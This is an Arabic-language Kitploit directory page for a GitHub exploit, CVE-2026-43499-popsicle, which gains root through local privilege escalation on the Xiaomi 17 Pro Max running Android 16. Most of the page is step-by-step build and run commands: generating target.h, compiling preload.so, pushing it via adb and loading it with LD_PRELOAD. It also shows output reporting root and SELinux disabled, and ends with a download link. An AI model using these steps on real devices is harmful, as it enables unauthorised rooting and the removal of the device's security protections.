Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-43499-popsicle — تنفيذ CVE-2026-43499 لـ 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k | Kitploit
أدوات/GitHubGitHub/x-spy/cve-2026-43499-popsicle
أمان أندرويدتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالأمن الجوالاستغلال الملفات الثنائية
GitHubx-spy/cve-2026-43499-popsicle

CVE-2026-43499-popsicle

تنفيذ CVE-2026-43499 لـ 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k

عرض المستودع
219818منذ شهر واحدتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-43499 لـ popsicle

يحتوي هذا المستودع على تنفيذ لرفع الامتيازات محليًا (Local Privilege Escalation) على نظام Android 16 لهاتف Xiaomi 17 Pro Max (popsicle) عبر CVE-2026-43499. النواة المُتحقق منها:

root@kitploit:~
6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k

تم التحقق من أن سلسلة Xiaomi 17 وPro وUltra التي تستخدم هذه النواة تعمل بالكامل.

توليد target

يتطلب Python 3 و llvm-objdump:

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --xbl-config xbl_config.img \
  -o source/src/target.h

التجميع

root@kitploit:~
make -C source clean preload

عند تعذر الاكتشاف التلقائي لـ NDK:

root@kitploit:~
NDK_ROOT=/path/to/android-ndk make -C source clean preload

الناتج النهائي:

root@kitploit:~
source/build/bin/preload.so

التشغيل

root@kitploit:~
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'

عند النجاح تظهر:

root@kitploit:~
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0

بعد اكتمال الاستغلال يمكن إضاءة الشاشة وفتح القفل والدخول إلى سطح المكتب، لكن أي تطبيق Android يُطلق حديثًا لا يتمكن من إكمال تهيئة Framework مما يؤدي إلى انهياره (crash)؛ بعد إعادة التشغيل تعود التطبيقات إلى الإقلاع بشكل طبيعي.

تنزيل الأداة